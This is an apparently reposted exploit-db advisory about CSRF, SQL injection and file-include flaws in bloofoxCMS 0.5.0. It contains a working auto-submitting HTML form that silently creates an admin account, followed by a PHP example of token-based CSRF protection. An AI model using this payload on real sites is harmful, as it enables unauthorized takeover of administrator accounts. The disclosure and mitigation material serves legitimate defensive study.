BloofoxCMS – ‘/admin/index.php’ Cross-Site Request Forgery (Add Admin)

  • Author: AtT4CKxT3rR0r1ST
  • Date: 2014-01-17
  • Category:
  • Platform:
  • Source: https://www.exploit-db.com/exploits/39031/
  • Source: https://www.securityfocus.com/bid/65019/info
    
    bloofoxCMS is prone to the following security vulnerabilities:
    
    1. Multiple SQL-injection vulnerabilities
    2. Multiple cross-site request forgery vulnerabilities
    3. A local file-include vulnerability
    
    Exploiting these issues could allow an attacker to execute arbitrary script code, steal cookie-based authentication credentials, obtain sensitive information, execute arbitrary server-side script code, or bypass certain security restrictions to perform unauthorized actions.
    
    bloofoxCMS 0.5.0 is vulnerable; other versions may also be affected. 
    
    [Add Admin]
    
    <html>
    <body onload="document.form0.submit();">
    <form method="POST" name="form0" action="http://localhost/admin/index.php?mode=user&action=new">
    <input type="hidden" name="username" value="Admin"/>
    <input type="hidden" name="password" value="123456"/>
    <input type="hidden" name="pwdconfirm" value="123456"/>
    <input type="hidden" name="3" value="Admin"/>
    <input type="hidden" name="blocked" value="0"/>
    <input type="hidden" name="deleted" value="0"/>
    <input type="hidden" name="status" value="1"/>
    <input type="hidden" name="login_page" value="0"/>
    <input type="hidden" name="send" value="Add User"/>
    </form>
    </body>
    </html>
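The proof of concept above works because the add-user handler accepts any POST that arrives with a valid admin session cookie; nothing ties the request to a form the administrator actually loaded. The standard fix is a synchronizer token: the server embeds a per-session secret in its own form and rejects any state-changing POST that does not echo it back. The following is an added example written for this page, not bloofoxCMS code; the endpoint `index.php?mode=user&action=new` and the field names come from the advisory, while `csrf_token`, `csrf_check`, `same_origin_request`, `ADMIN_HOST` and the `$_POST['csrf_token']` field are assumed names chosen for the illustration.

```php
<?php
// Added example: CSRF protection for an admin "add user" form (not bloofoxCMS code).
// Requires PHP 7.3+ for the array form of session_set_cookie_params().

// Hypothetical: the host the admin panel is served from, used for the Origin check.
const ADMIN_HOST = 'localhost';

// Second layer of defence: a SameSite=Lax session cookie is not sent on a
// cross-site top-level POST, so the forged request arrives unauthenticated.
session_set_cookie_params([
    'httponly' => true,
    'samesite' => 'Lax',
]);
session_start();

// Returns the per-session token, creating it on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison of the submitted token against the session copy.
// A missing token on either side is a failure, never a pass.
function csrf_check(?string $submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    if ($submitted === null || $expected === '') {
        return false;
    }
    return hash_equals($expected, $submitted);
}

// Defence in depth: the Origin (or, failing that, Referer) header of a
// browser-issued cross-site POST names the attacker's page, not the CMS.
// Missing headers are treated as a failure for state-changing requests.
function same_origin_request(string $expectedHost): bool
{
    $origin = $_SERVER['HTTP_ORIGIN'] ?? $_SERVER['HTTP_REFERER'] ?? '';
    if ($origin === '') {
        return false;
    }
    return parse_url($origin, PHP_URL_HOST) === $expectedHost;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_check($_POST['csrf_token'] ?? null) || !same_origin_request(ADMIN_HOST)) {
        http_response_code(403);
        error_log('Rejected add-user POST without a valid CSRF token from ' . ($_SERVER['REMOTE_ADDR'] ?? '?'));
        exit('Request rejected.');
    }
    // Only past this point would the user record be created, using the
    // validated username / password / pwdconfirm fields from the advisory.
}
?>
<!-- The legitimate form carries the token; a forged form on another origin cannot read it. -->
<form method="POST" action="index.php?mode=user&amp;action=new">
  <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="password" name="pwdconfirm">
  <input type="submit" name="send" value="Add User">
</form>
```

With this in place the advisory's auto-submitting page fails twice over: the forged POST carries no `csrf_token` (the attacker's origin cannot read the victim's session token), and with a `SameSite=Lax` session cookie the browser does not even attach the admin session to the cross-site request. Token validation must happen before any database write, and the token should be compared with `hash_equals` rather than `==` so that timing does not leak it.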